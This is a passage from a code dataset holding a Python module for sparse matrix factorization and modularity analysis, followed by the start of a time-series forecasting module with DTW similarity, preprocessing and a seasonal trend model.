'Lars', 'Ridge', 'OMP'\n#method_W = 'Lasso', 'Ridge'\n#mask = None or a Boolean matrix with the shape of F specifying which values are missing (True = present, False = missing)\n\n\n\ndef run_factorizer_regularized_range(F, K, lamb1s, lamb2s , method_M = 'Lasso', method_W = 'Lasso', norm = 'envs', verbose=True, mask = None, \\\nM_lb=1e-3, W_lb = 1e-3, fit_intercept = False): #add \"all\" option by default\n #SVD\n u,s,vh = np.linalg.svd(F - fit_intercept*np.mean(F,axis=0))\n u_K = u[:,:K]\n s_K = s[:K]\n vh_K = vh[:K]\n\n to_return = None\n if verbose:\n print(\"Kmax lambW lambM error_ours error_svd K av.proc./loci av.proc./env loci dropped grassmann to svd\")\n our_errs = []\n mods = []\n ndls = []\n Ws = np.zeros((len(lamb1s),len(lamb2s),F.shape[0],K))\n Ms = np.zeros((len(lamb1s),len(lamb2s),K,F.shape[1]))\n bs = np.zeros((len(lamb1s),len(lamb2s),F.shape[1]))\n for il1, lamb1 in enumerate(lamb1s):\n for il2,lamb2 in enumerate(lamb2s):\n if fit_intercept:\n b = np.mean(F,axis=0)\n else:\n b = np.zeros(F.shape[1])\n\n if norm == 'loci' or norm == 'mods_M':\n M = np.zeros((Ms.shape[2],Ms.shape[3]))\n M = deepcopy(vh_K)\n W = np.matmul(F - np.mean(F,axis=0),M.T)\n else:\n W = np.zeros((Ws.shape[2],Ws.shape[3]))\n W = deepcopy(u_K)\n M = np.matmul(W.T,F - np.mean(F,axis=0))\n\n \n for i in range(5):\n if i%1==0:\n err_EM = np.mean((F - np.matmul(W,M) - b)**2)\n err_SVD = np.mean((F - np.matmul(u_K,s_K[:,None]*vh_K) - fit_intercept*np.mean(F,axis=0))**2)\n\n W,M,b = optimize(F,W,M,lamb1,lamb2, method_M = method_M, method_W = method_W, norm = norm, mask = mask, fit_intercept = fit_intercept, b=b)\n # truncate\n W = (np.abs(W)> 
W_lb)*W\n M = (np.abs(M)> M_lb)*M\n\n if fit_intercept == False:\n b = np.zeros(F.shape[1])\n\n Ws[il1,il2] = W\n Ms[il1,il2] = M\n bs[il1,il2] = b\n \n #compute L2 error\n err_EM = np.mean((F - np.matmul(W,M) - b)**2)\n err_SVD = np.mean((F - np.matmul(u_K,s_K[:,None]*vh_K) - fit_intercept*np.mean(F,axis=0))**2)\n grass = grassmann(M,vh_K)\n\n #compute modularity\n ndl = dropped_loci(M)\n nde = dropped_envs(W)\n mod = ave_mod_per_loci(M)\n mode = ave_mod_per_env(W)\n \n mods.append(mod)\n ndls.append(ndl)\n our_errs.append(err_EM)\n \n if verbose:\n if norm == 'loci' or norm == 'mods_M': keff = int(np.ceil(np.sum(M**2)))\n else: keff = int(np.ceil(np.sum(W**2)))\n print(f\"{K:2d} {lamb1:.4f} {lamb2:.4f} {err_EM:.3f} {err_SVD:.3f} {keff:2d} {mod:.3f} {mode:.3f} {ndl:3d} {grass:.3f}\") \n \n return Ws, Ms, bs, mods, ndls\n\n\n\ndef optimize(F,W,M,lamb1,lamb2, method_M = 'Lasso', method_W = 'Lasso', norm = 'envs', mask = None, fit_intercept = False, b = None, niters = 5): \n if mask is None:\n mask = np.ones(F.shape,dtype = bool)\n\n if fit_intercept == True and b is None:\n raise ValueError(\"need b\")\n\n for i in range(niters):\n M,b = optimize_M(F,W,lamb2,method = method_M, norm = norm, mask = mask, fit_intercept = fit_intercept)\n W = optimize_W(F,M,lamb1,method = method_W, norm = norm, mask = mask, fit_intercept = fit_intercept, b = b)\n \n return W,M,b\n\n\ndef optimize_M(F,W,lamb2, method = 'Lasso', norm = None, mask = None, fit_intercept = False): #norm = 'loci' or norm = 'mods_M' or norm = None\n if mask is None:\n mask = np.ones(F.shape,dtype = bool)\n M = np.zeros((W.shape[1],F.shape[1]))\n\n M2_1= np.sum(np.sum(M**2,axis=1) > 1e-6)\n\n b = np.mean(F,axis=0)\n for i in range(F.shape[1]):\n if method == 'Ridge':\n clf = Ridge(alpha = lamb2, fit_intercept = fit_intercept)\n clf.fit(W[mask[:,i]],F[mask[:,i],i])\n M[:,i] = clf.coef_\n b[i] = clf.intercept_\n elif method == 'Lasso':\n clf = Lasso(alpha = lamb2, fit_intercept = fit_intercept)\n clf.fit(W[mask[:,i]],F[mask[:,i],i])\n M[:,i] = clf.coef_\n b[i] = clf.intercept_\n elif method == 'Lars':\n clf = Lars(n_nonzero_coefs=lamb2, fit_intercept = fit_intercept)\n clf.fit(W[mask[:,i]],F[mask[:,i],i])\n M[:,i] = clf.coef_\n b[i] = clf.intercept_\n elif method == 'OMP':\n M[:,i] = orthogonal_mp(W[mask[:,i]],F[mask[:,i],i],n_nonzero_coefs = lamb2)\n else:\n clf = Ridge(alpha = 1e-5, fit_intercept = fit_intercept)\n clf.fit(W[mask[:,i]],F[mask[:,i],i])\n M[:,i] = clf.coef_\n b[i] = clf.intercept_\n\n M2_2 = np.sum(np.sum(M**2,axis=1) > 1e-6)\n\n if norm == 'loci':\n M = M/(1e-9+np.sqrt(np.sum(M**2,axis=1))[:,None])\n elif norm == 'mods_M':\n M = M/(1e-9+np.sqrt(np.sum(M**2,axis=0))[None,:])\n\n M2_3 = np.sum(np.sum(M**2,axis=1) > 1e-6)\n\n return M,b\n\ndef optimize_W(F,M,lamb1, method = 'Lasso', norm = 'envs', mask = None, fit_intercept = False, b = None): #norm = 'envs' or 'mods_W' or 'None'\n if mask is None:\n mask = np.ones(F.shape,dtype = bool)\n\n if fit_intercept == True and b is None:\n raise ValueError(\"need b\")\n\n if fit_intercept == False:\n b = np.zeros(F.shape[1])\n\n K = M.shape[0]\n W = np.zeros((F.shape[0],M.shape[0]))\n for e in range(F.shape[0]):\n if method == 'Lasso':\n clf = Lasso(alpha = lamb1, fit_intercept = False)\n clf.fit(M[:,mask[e,:]].T,F[e,mask[e,:]] - fit_intercept*b[mask[e,:]])\n W[e,:] = clf.coef_\n else:\n clf = Ridge(alpha = lamb1, fit_intercept = False)\n clf.fit(M[:,mask[e,:]].T,F[e,mask[e,:]] - fit_intercept*b[mask[e,:]])\n W[e,:] = clf.coef_\n \n if norm == 'envs':\n W = 
W/(1e-9+np.sqrt(np.sum(W**2,axis=0))[None,:]) #normalize across environments\n elif norm == 'mods_W':\n W = W/(1e-9+np.sqrt(np.sum(W**2,axis=1))[:,None]) #normalize across modules\n \n return W\n\n\n\ndef ptk(l,r = 4): #parameter to key\n return round(l,r)\n\n\ndef cluster_kmeans(M,Kp, rs = 1 ):\n norms = np.sqrt(np.sum(M**2,axis=0))\n filt = norms > 1e-6\n Mfilt = deepcopy(M[:,filt])\n M_norm = Mfilt#/norms[filt]\n \n kmeans = KMeans(n_clusters=Kp, random_state=rs).fit(M_norm.T)\n D = kmeans.cluster_centers_.T\n P = np.zeros((Kp,M_norm.shape[1]))\n for i in range(M_norm.shape[1]):\n P[kmeans.labels_[i],i] = 1#norms[i]\n \n P_final = np.zeros((Kp,M.shape[1]))\n labels_final = np.zeros(M.shape[1],dtype= int) - 1\n \n inds= np.arange(M.shape[1])[filt]\n P_final[:,inds] = deepcopy(P)\n labels_final[inds] = kmeans.labels_\n \n return D,P_final, labels_final\n\ndef optimize_TDP(F,M,W,b,Kp, lamb1, lamb2, niter = 8, verbose = False):\n Mhat = deepcopy(M)\n bhat = deepcopy(b)\n That = deepcopy(W)\n K = W.shape[1]\n Ferr_M = np.mean((F - W@M - b)**2)\n Ts = np.zeros((niter,W.shape[0],K))\n Ds = np.zeros((niter,K,Kp))\n Ps = np.zeros((niter,Kp,M.shape[1]))\n errs = np.zeros(niter)\n for i in range(niter):\n #get D,P\n T = deepcopy(That)\n D,P,l = cluster_kmeans(Mhat,Kp, rs = i)\n Mhat = D@P\n Merr = np.mean((M - Mhat)**2)/(np.std(M)**2)\n Ferr_Mhat = np.mean((F - That@Mhat - bhat)**2)\n \n #get TD\n #TDhat = ((F-bhat)@np.linalg.pinv(P))\n TDhat = That@D\n \n Ferr_TDhat = np.mean((F - TDhat@P - bhat)**2)\n \n #decompose TD\n # u,s,vh = np.linalg.svd(TDhat)\n # u_K = u[:,:K]\n # s_K = s[:K]\n # vh_K = vh[:K]\n # D = deepcopy(vh_K)\n # T = np.matmul(TDhat,D.T)\n # T,D,_ = optimize(TDhat,T,D,lamb1,lamb2, norm = \"mods_M\", niters = 10)\n \n # TD = T@D\n TDerr = 0\n #TDerr = np.mean((TD - TDhat)**2)/(np.std(TDhat)**2)\n #P,_ = em.optimize_M(F - bhat,TD,1,method = \"OMP\")\n #P = np.linalg.pinv(TD)@(F-bhat)\n\n T = ((F-bhat)@np.linalg.pinv(D@P))\n\n #Ferr_TDPhat = np.mean((F - TDhat@P - bhat)**2)\n \n #Mhat = np.linalg.pinv(T)@(F-bhat)\n Mhat,_ = optimize_M(F-bhat,T,lamb2,norm = \"loci\", fit_intercept=False)\n That = deepcopy(T)\n T = deepcopy(That)\n\n Ferr_TDPhat = np.mean((F - (T@D)@P - bhat)**2)\n\n\n Ts[i] = T\n Ds[i] = D\n Ps[i] = P\n errs[i] = Ferr_TDPhat\n \n if verbose:\n print(\"%02d %.4f %.4f %.4f %.4f %.4f %.4f\" %(Kp, Merr, Ferr_M, Ferr_Mhat, Ferr_TDhat, TDerr, Ferr_TDPhat))\n\n minner = np.argmin(errs)\n T = Ts[minner]\n D = Ds[minner]\n P = Ps[minner]\n if verbose:\n print(\"TDP: %02d %.3f\" %(Kp, errs[minner]))\n\n return T,D,P,errs[minner]\n\ndef run_svd(F, K, M_lb=0, W_lb=0):\n u,s,vh=np.linalg.svd(F)\n W, M = u[:,:K]*s[None,:K], vh[:K]\n W = (np.abs(W)> W_lb)*W\n M = (np.abs(M)> M_lb)*M\n return M, W\n\ndef dropped_loci(M):\n K = M.shape[0]\n nzl = np.abs(np.sum(M, axis = 0)) > 0\n ndl = len(nzl)-sum(nzl)\n return ndl\n\ndef dropped_envs(W):\n K = W.shape[1]\n nze = np.abs(np.sum(W, axis = 1)) > 0\n nde = len(nze)-sum(nze)\n return nde\n\n\ndef grassmann(A,B, mode = \"squares\"): #A, B are K x L\n if np.sum(np.abs(A)) == 0 or np.sum(np.abs(B)) == 0:\n return np.sqrt(A.shape[0]*np.pi**2)\n Ma = orth(A.T)\n Mb = orth(B.T)\n Q = Ma.T @ Mb\n\n u,s,vh = np.linalg.svd(Q)\n if mode == \"squares\":\n s = (s>=1)*np.ones(len(s)) + (s<1)*s\n return np.sqrt(np.sum(np.arccos(s)**2))\n elif mode == \"cosines\":\n return np.sum((1-s)/2)\n \ndef ave_mod_per_loci(M):\n K = M.shape[0]\n nzl = np.abs(np.sum(M, axis = 0)) > 0\n return np.mean(np.sum(np.abs(M[:, nzl])>0,axis=0)) # doesn't include dropped 
loci\n\ndef ave_mod_per_env(W):\n K = W.shape[1]\n nze = np.abs(np.sum(W, axis = 1)) > 0\n return np.mean(np.sum(np.abs(W[nze, :])>0,axis=1)) # doesn't include dropped envs\n\ndef get_attributes_of_solns(fct_F, mode = 'reg'):\n mods = []\n keffs = []\n errors = []\n ave_part_in = []\n l1s = []\n l2s = []\n if fct_F.init_mode == \"FXY\":\n T_errors = []\n V_errors = []\n ks = []\n ave_mod_per_env = []\n for p in fct_F.computed_params(printout=False):\n if p[0]!=mode: continue\n l1s.append(p[2][0])\n l2s.append(p[2][1])\n ks.append(p[1])\n keffs.append(int(np.ceil(np.sum(fct_F.M_preds[p]**2))))\n mods.append(fct_F.modularities[p])\n errors.append(np.mean(fct_F.L2FFs[p]))\n ave_part_in.append(ave_mod_per_loci(fct_F.M_preds[p])) # doesn't include dropped loci\n ave_mod_per_env.append(ave_mod_per_loci(fct_F.W_preds[p].T)) # doesn't include dropped loci\n\n if fct_F.init_mode == \"FXY\":\n T_errors.append(np.mean(fct_F.R2Ts[p]))\n V_errors.append(np.mean(fct_F.R2Vs[p]))\n print(p, ks[-1], keffs[-1], errors[-1], ave_part_in[-1])\n atts= {}\n atts[\"modularity\"] = mods\n atts[\"ave modules / loci\"]= ave_part_in\n atts[\"ave modules / env\"]= ave_mod_per_env\n atts[\"keff\"] = keffs\n atts[\"error\"] = errors\n atts[\"k\"] = ks\n atts[\"lamb1\"] = l1s\n atts[\"lamb2\"] = l2s\n if fct_F.init_mode == \"FXY\":\n atts[\"training variance explained\"] = T_errors\n atts[\"validation variance explained\"] = V_errors\n\n return atts\n\ndef plot_attributes(atts, x_key, y_key, color_key, filter_type=None, filter_range =None, cmap = \"Dark2\", title = None, xrange = None, yrange = None, crange = None):\n if filter_type is not None:\n xs, ys, cs = [], [], []\n for _, x in enumerate(atts[filter_type]):\n if x>filter_range[0] and x< filter_range[1]:\n xs.append(atts[x_key][_])\n ys.append(atts[y_key][_])\n cs.append(atts[color_key][_])\n else:\n xs, ys, cs = atts[x_key], atts[y_key], atts[color_key]\n if crange is None:\n plt.scatter(xs,ys, c = cs, cmap = cmap)\n else:\n plt.scatter(xs,ys, c = cs, cmap = cmap, vmin = crange[0], vmax = crange[1])\n\n if xrange is not None: plt.xlim(xrange)\n if yrange is not None: plt.ylim(yrange)\n plt.xlabel(x_key)\n plt.ylabel(y_key)\n if title is not None: plt.title(title)\n cbar = plt.colorbar()\n cbar.set_label(color_key)\n plt.grid()\n plt.show()\n \n\n################### Functions for generating synthetic F = WM + c ###########################\n\ndef get_W_and_M_structured(h, H, p, L, hub_sparsity, M_sparsity, rho, seed = 0):\n #there are h hub envs with p possible perturbations to each. rho sets magnitude of the perturbation, Total of h*(p+1) possible environments. \n #1 core trait which affects all environments, H hub modules, p perturbation modules. 
K = 1 + H + p\n \n if M_sparsity is None: M_sparsity = 1\n if hub_sparsity is None: hub_sparsity = 1\n np.random.seed(seed)\n\n E = int(h*(1+p))\n K = int(H + p)\n\n W = np.zeros((E,K))\n\n for e in range(h): #for each hub env\n filt_hub = np.random.uniform(size = (H)) < hub_sparsity # hub-module membership \n modules_hub = np.zeros(K,dtype=int)\n modules_hub[:H][filt_hub] = 1\n\n Whub = np.random.randn(K)\n #Whub = np.ones(K)\n\n W[e*(1+p),:] = Whub*modules_hub #hub environment\n\n for n in range(p):\n modules_pert = deepcopy(modules_hub)\n modules_pert[H+n] = rho\n W[e*(1+p) + n + 1, :] = Whub*modules_pert\n \n \n filt = np.random.uniform(size = (K,L)) < M_sparsity # loci-module membership\n M = filt*np.random.randn(K,L) # weights are iid normal\n M = M/(1e-9+np.sqrt(np.sum(M**2,axis=1))[:,None]) # normalize so each module has norm 1\n \n F = W @ M\n \n # chose magnitude of C (is one std of means across loci)\n locs = np.mean(F ,axis=0)\n mag_locs = np.std(locs)\n \n C = mag_locs*np.random.randn(L)\n\n return W,M,C\n\n\ndef get_W_and_M_simple(E,L,K, M_sparsity, W_sparsity, seed = 0):\n # E = envs\n # L = loci\n # K = modules\n # M_sparsity = bernoulli prob of each loci in each module; 1 if None\n # W_sparsity = bernoulli prob of each env using each module; 1 if None\n \n np.random.seed(seed)\n\n if M_sparsity is None: M_sparsity = 1\n if W_sparsity is None: W_sparsity = 1\n \n filt = np.random.uniform(size = (E,K)) < W_sparsity\n W = filt*np.random.randn(E,K) # weights are iid normal\n \n filt = np.random.uniform(size = (K,L)) < M_sparsity # loci-module membership\n M = filt*np.random.randn(K,L) # weights are iid normal\n M = M/(1e-9+np.sqrt(np.sum(M**2,axis=1))[:,None]) # normalize so each module has norm 1\n \n F = W @ M\n \n # chose magnitude of C (is one std of means across loci)\n locs = np.mean(F ,axis=0)\n mag_locs = np.std(locs)\n C = mag_locs*np.random.randn(L)\n\n return W,M,C\n\n\n############### OLD (PROBABLY DELETE) ####################\n\n\n#plots the dot product similarity between W vectors amongst themselves and with singular vectors\ndef plot_dots(F,W, savefile= None, compare = \"w\"): #compare = \"w\" or \"u\" for Ws and SVD resp.\n K = W.shape[1]\n\n u,s,vh=np.linalg.svd(F)\n\n u_K = u[:,:K]\n s_K = s[:K]\n vh_K = vh[:K]\n\n if compare == \"w\":\n dots = np.zeros((K,K))\n for i in range(K):\n for j in range(K):\n dots[i,j] = np.dot(W[:,i],W[:,j])\n\n plt.close(\"all\")\n fig,axis = plt.subplots(1,1,figsize= (5,4.5))\n im = axis.imshow(np.abs(dots),vmin = 0,vmax = 1)\n fig.colorbar(mappable=im)\n axis.tick_params(labelsize = 18)\n axis.set_title(\"$w_i.w_j$\",fontsize = 20)\n if savefile is not None:\n fig.savefig(savefile + \"_%d\"%W.shape[1] + \"_ww.png\",dpi = 150)\n plt.show()\n\n else:\n dots_svd = np.zeros((K,K))\n for i in range(K):\n for j in range(K):\n dots_svd[i,j] = np.dot(W[:,i],u_K[:,j])\n\n filt = np.argsort(-np.abs(np.diag(dots_svd))) \n dots_svd_sorted = (dots_svd[:,filt])[filt,:]\n\n plt.close(\"all\")\n fig,axis = plt.subplots(1,1,figsize= (5,4.5))\n im = axis.imshow(np.abs(dots_svd_sorted),vmin = 0,vmax = 1)\n fig.colorbar(mappable=im)\n axis.tick_params(labelsize = 18)\n axis.set_title(\"$w_i.u_j$\",fontsize = 20)\n if savefile is not None:\n fig.savefig(savefile + \"_%d\"%W.shape[1] + \"_wu.png\",dpi = 150)\n plt.show()\n \n \n\n\ndef get_errors_heldout(F,envs_ho,K,lamb2s,lamb1,verbose = True):\n E_ho = len(envs_ho)\n E = F.shape[0]\n L = F.shape[1]\n \n envs_ho_slice = np.zeros(E,dtype=bool)\n envs_ho_slice[envs_ho] = 1\n\n \n Ws, Ms = 
run_factorizer_regularized_range(F[~envs_ho_slice], K, lamb2s, lamb1, norm = \"loci\")\n\n u,s,vh = np.linalg.svd(F[~envs_ho_slice])\n u_K = u[:,:K]\n s_K = s[:K]\n vh_K = vh[:K]\n Msvd = vh_K\n\n Ws = np.zeros((len(Ws),E,K))\n Wsvds = np.zeros((len(Ws),E,K))\n\n F_ems = np.zeros((len(Ws),E,L))\n F_svds = np.zeros((len(Ws),E,L))\n\n for im,M in enumerate(Ms):\n A = np.eye(K)*lamb1 + np.matmul(M,M.T)\n B = np.linalg.solve(A,M)\n Ws[im] = np.matmul(F,B.T)\n F_ems[im] = Ws[im]@M\n\n A = np.eye(K)*lamb1 + np.matmul(Msvd,Msvd.T)\n B = np.linalg.solve(A,Msvd)\n Wsvds[im] = np.matmul(F,B.T)\n F_svds[im] = Wsvds[im]@Msvd\n\n if verbose:\n print(\"lamb2 Err EM nHO Err EM HO Err SVD nHO Err SVD HO \")\n errs_EM_nho = np.zeros(len(lamb2s))\n errs_EM_ho = np.zeros(len(lamb2s))\n errs_SVD_nho = np.zeros(len(lamb2s))\n errs_SVD_ho = np.zeros(len(lamb2s))\n\n for i in range(len(lamb2s)):\n err_EM_nho = np.mean((F[~envs_ho_slice] - F_ems[i][~envs_ho_slice])**2)\n err_EM_ho = np.mean((F[envs_ho_slice] - F_ems[i][envs_ho_slice])**2)\n\n err_SVD_nho = np.mean((F[~envs_ho_slice] - F_svds[i][~envs_ho_slice])**2)\n err_SVD_ho = np.mean((F[envs_ho_slice] - F_svds[i][envs_ho_slice])**2)\n\n errs_EM_nho[i] = err_EM_nho\n errs_EM_ho[i] = err_EM_ho\n errs_SVD_nho[i] = err_SVD_nho\n errs_SVD_ho[i] = err_SVD_ho\n \n if verbose:\n print(\"%.3f %.3f %.3f %.3f %.3f\"%(lamb2s[i],err_EM_nho,err_EM_ho, err_SVD_nho, err_SVD_ho))\n\n return errs_EM_nho, errs_EM_ho, errs_SVD_nho, errs_SVD_ho\n\ndef get_atts_with_keff_and_k_fixed(atts, k ):\n restricted_atts = dict.fromkeys(atts.keys(),[])\n for key in atts:\n new_list = []\n for _ in range(len(atts[\"keff\"])):\n if atts[\"keff\"][_] == k and atts[\"k\"][_]==k:\n new_list.append(atts[key][_])\n restricted_atts[key] = new_list\n\n return restricted_atts\n\ndef plot_tradeoffs(atts, atts_rot, kmin, kmax, ks=None, title = None):\n fontsize = 14\n restricted_atts = {}\n restricted_atts_rot = {}\n if kmin is not None:\n ks = range(kmin,kmax+1)\n else:\n kmin = min(ks)\n kmax = max(ks)\n for k in ks:\n restricted_atts[k] = get_atts_with_keff_and_k_fixed(atts, k)\n restricted_atts_rot[k] = get_atts_with_keff_and_k_fixed(atts_rot, k)\n #plt.scatter(restricted_atts[k][\"ave modules / loci\"], restricted_atts[k][\"error\"])\n #plt.scatter(restricted_atts_rot[k][\"ave modules / loci\"], restricted_atts_rot[k][\"error\"])\n #plt.title(f\"k={k}\")\n #plt.show()\n if len(restricted_atts_rot[k][\"ave processes / loci\"])>0:\n mn = min(restricted_atts_rot[k][\"ave processes / loci\"])\n mx = max(restricted_atts_rot[k][\"ave processes / loci\"])\n else:\n mn = 0\n mx = 0\n f = interpolate.interp1d(restricted_atts_rot[k][\"ave processes / loci\"], restricted_atts_rot[k][\"error\"])\n restricted_atts[k][\"FO err / F err\"] = []\n for _,aml in enumerate(restricted_atts[k][\"ave processes / loci\"]):\n if aml < mn or aml > mx:\n restricted_atts[k][\"FO err / F err\"].append(-1)\n else:\n restricted_atts[k][\"FO err / F err\"].append(f(aml)/restricted_atts[k][\"error\"][_])\n #plt.scatter(restricted_atts[k][\"ave modules / loci\"],restricted_atts[k][\"FO err / F err\"] )\n #plt.show()\n\n plt.figure(figsize=(12,8))\n mn = 100\n mx = -1\n for k in ks:\n if len(restricted_atts[k][\"FO err / F err\"])>0:\n mx = max(max(restricted_atts[k][\"FO err / F err\"]), mx)\n if len([_ for _ in restricted_atts[k][\"FO err / F err\"] if _>0])>0:\n mn = min(min([_ for _ in restricted_atts[k][\"FO err / F err\"] if _>0]), mn)\n\n for k in ks:\n x1s, x2s, y1s, y2s, c1s = [], [], [], [], []\n for n, val in 
enumerate(restricted_atts[k][\"FO err / F err\"]):\n if val > 0:\n x1s.append(restricted_atts[k][\"error\"][n])\n y1s.append(restricted_atts[k][\"ave processes / loci\"][n])\n c1s.append(restricted_atts[k][\"FO err / F err\"][n])\n else:\n x2s.append(restricted_atts[k][\"error\"][n])\n y2s.append(restricted_atts[k][\"ave processes / loci\"][n]) \n plt.plot(restricted_atts[k][\"error\"],restricted_atts[k][\"ave processes / loci\"], label = f\"k = {k}\", c = 'black', alpha = .8-.8*((k-kmin) / (kmax-kmin + 1)))\n plt.scatter(x2s, y2s, marker = 'd', c= 'black')\n plt.scatter(x1s,y1s, c = c1s, vmin = mn, vmax =mx, cmap = 'viridis_r')\n\n\n plt.xlabel(\"error\", fontsize = fontsize)\n plt.ylabel(\"ave processes / loci\", fontsize = fontsize)\n cbar = plt.colorbar()\n cbar.set_label(\"FO error / F error\")\n plt.legend()\n plt.grid()\n if title is not None: plt.title(title, fontsize = fontsize)\n plt.show()\n \n","repo_name":"spetti/sparse-structure-discovery","sub_path":"SSD/utils/ssd.py","file_name":"ssd.py","file_ext":"py","file_size_in_byte":22760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41022878864","text":"import logging\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom typing import List, Literal, Union\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\n\nlogging.basicConfig(level=logging.DEBUG, format=\"%(asctime)s %(levelname)s:%(message)s\")\nLOGGER = logging.getLogger(__name__)\n\n\nclass SymCalc:\n def __init__(self, method: Literal[\"dtw\", \"chi_square\"] = \"dtw\", bin_size: str = 30, \n agg_f: Literal[\"median\", \"mean\"] = \"median\") -> None:\n self.method = method\n self.bin_size = bin_size\n self.agg_f = agg_f\n \n def __call__(self, p: np.ndarray, q: np.ndarray) -> float:\n method = getattr(self, self.method)\n distance = method(p, q)\n return distance\n \n def chi_square(self, p: np.ndarray, q: np.ndarray) -> float:\n n_items = (len(p) + len(q)) // 2\n n_splits = self.calc_nsplits_(n_items=n_items, bin_size=self.bin_size)\n agg_f = getattr(np, \"nan\" + self.agg_f)\n\n bins_p = np.array_split(ary=p, indices_or_sections=n_splits)\n bins_p = np.array([agg_f(arr) for arr in bins_p])\n bins_p /= sum(bins_p)\n\n bins_q = np.array_split(ary=q, indices_or_sections=n_splits)\n bins_q = np.array([agg_f(arr) for arr in bins_q])\n bins_q /= sum(bins_q)\n\n statistic, _ = stats.chisquare(f_obs=bins_p, f_exp=bins_q, ddof=0)\n return statistic\n\n @staticmethod\n def calc_nsplits_(n_items: int, bin_size: int) -> int:\n return n_items // bin_size + (1 if n_items % bin_size else 0)\n\n @staticmethod\n def dtw(p: np.ndarray, q: np.ndarray) -> float:\n # create empty cost matrix\n cost_m = [[0 for _ in range(len(q))] for _ in range(len(p))]\n\n # заполним матрицу\n cost_m[0][0] = abs(p[0] - q[0])\n for col in range(0, len(q)):\n\n if col != 0:\n cost_m[0][col] = abs(p[0] - q[col]) + cost_m[0][col - 1]\n\n for row in range(1, len(p)):\n if col == 0:\n cost_m[row][col] = abs(p[row] - q[col]) + cost_m[row - 1][col]\n continue\n\n cost_m[row][col] = \\\n abs(p[row] - q[col]) + \\\n min(cost_m[row - 1][col - 1], cost_m[row - 1][col], cost_m[row][col - 1])\n \n # wraping path identification\n row, col = len(p) - 1, len(q) - 1\n d = []\n d.append(cost_m[row][col])\n\n while row > 0 or col > 0:\n neighbors = [float(\"inf\"), float(\"inf\"), float(\"inf\")]\n if row > 0 and col > 0:\n neighbors[2] = cost_m[row - 1][col - 1]\n if row > 0:\n neighbors[1] = 
cost_m[row - 1][col]\n if col > 0:\n neighbors[0] = cost_m[row][col - 1]\n idx = np.argmin(neighbors) + 1\n step = (idx // 2, idx % 2)\n row, col = row - step[0], col - step[1]\n d.append (cost_m[row][col]) \n\n return sum(d) / len(d)\n\n\nclass Preprocessing:\n \n def __init__(self, roles: dict = {}, stages: List[Literal[\"extend_time\", \"interpolate\"]] = [\"extend_time\", \"interpolate\"]) -> None:\n self.roles = {\"datetime\": \"datetime\", \"value\": \"value\", **roles}\n self.stages = stages\n\n def __call__(self, data: pd.DataFrame) -> pd.DataFrame:\n for stage in self.stages:\n method = getattr(self, stage)\n data = method(data)\n return data\n\n def extend_time(self, data: pd.DataFrame) -> pd.DataFrame:\n min_date, max_date = data[self.roles.get(\"datetime\")].agg([\"min\", \"max\"])\n freq = int(data[self.roles.get(\"datetime\")].diff().dropna().min().total_seconds() // 60)\n timeline = pd.date_range(start=min_date, end=max_date, freq=\"%sT\" % freq)\n data = pd.DataFrame(data={self.roles.get(\"datetime\"): timeline}) \\\n .merge(data.rename(columns=self.roles), on=self.roles.get(\"datetime\"), how=\"left\")\n return data\n\n def interpolate(self, data: pd.DataFrame) -> pd.DataFrame:\n data.loc[:, self.roles.get(\"value\")] = data.loc[:, self.roles.get(\"value\")] \\\n .interpolate(method=\"linear\", limit_area=\"inside\")\n return data\n \n\ndef rolling(arr: np.ndarray, window: int = 50, agg_f: Literal[\"mean\", \"median\"] = \"median\"):\n agg_f = getattr(np, \"nan\" + agg_f)\n ans = np.full_like(a=arr, fill_value=1, dtype=\"float64\")\n wc = window // 2 + (1 if window % 2 else 0) - 1\n for i in range(0, len(arr)):\n left_idx = max(0, i - wc)\n right_idx = left_idx + window\n\n if right_idx > len(arr):\n right_idx = len(arr)\n left_idx = right_idx - window\n\n value = agg_f(arr[left_idx:right_idx])\n ans[i] = value\n return ans\n\n\nclass TSModel:\n\n def __init__(self, h_size: int = 28, trend: Literal[\"linear\", \"polynomial\"] = \"linear\", p_degree: int = 2,\n roles: dict = {}, seasonal_type: Union[int, Literal[\"weekly\", \"daily\"]] = \"weekly\", \n agg_f: Literal[\"mean\", \"median\"] = \"median\", model_type: Literal[\"additive\", \"multiplicative\"] = \"additive\",\n holidays: pd.DataFrame = None, freq: int = 1, skip_holidays: bool = True, \n use_skaler: bool = True, scaler_window: int = 50, scaler_agg: Literal[\"mean\", \"median\"] = \"mean\", \n fix_negative: bool = True, **kwargs) -> None:\n \"\"\"\n :param h_size: размер обучающей выборки количестве значений (в днях)\n :param trend: тип детектируемого тренда (\"linear\" или \"polynomial\")\n :param p_degree: степень полинома в случае с полиномиальным трендом\n :param roles: названия колонок \"datetime\" и \"value\" в данных\n :param seasonal_type: тип максимальной сезонности (т.е. 
если присутствует и недельная, и дневная, то указывается недельная)\n :param agg_f: аггрегирующая функция при расчете сезонной компоненты\n :param model_type: тип модели (аддитивная или мультипликативная)\n \"\"\"\n self.h_size = h_size\n self.trend = trend\n self.p_degree = p_degree\n self.roles = {\"datetime\": \"datetime\", \"value\": \"value\", **roles}\n self.seasonal_type = seasonal_type\n self.agg_f = agg_f\n self.model_type = model_type\n self.holidays = holidays\n self.freq = freq\n self.skip_holidays = skip_holidays\n self.use_skaler = use_skaler\n self.scaler_window = scaler_window\n self.scaler_agg = scaler_agg\n self.fix_negative = fix_negative\n\n def fit_predict(self, data: pd.DataFrame, horizon: int = 1, py_data: pd.DataFrame = None) -> pd.DataFrame:\n \"\"\"\n :param data: исторические данные для настройки модели\n :param horizon: горизонт прогнозирования (в днях)\n \"\"\"\n # настройка модели\n self.fit(data=data)\n\n # предсказание модели\n results = self.predict(horizon=horizon, py_data=py_data)\n return results\n\n def fit(self, data: pd.DataFrame) -> None:\n \"\"\"\n :param data: DataFrame с колонками даты и значения\n значения должны быть без пропусков в timeline\n \"\"\"\n # первая дата для предсказ��ния\n self.predict_from = data[\"datetime\"].iloc[-1] + pd.DateOffset(minutes=self.freq)\n\n # количество данных для обучения\n self.h_size_items = int(self.h_size * (24 * 60) // self.freq)\n\n # если размер истории меньше, чем выставленный параметр размера истории\n # то корректируем\n self.h_size_items = min(len(data), self.h_size_items)\n\n # настраиваем тренд\n fit_data = data.iloc[-self.h_size_items:, :] # обучающая выборка\n self.discard_mask = fit_data[self.roles.get(\"value\")].isna().values\n if self.holidays is not None and self.skip_holidays:\n self.discard_mask |= 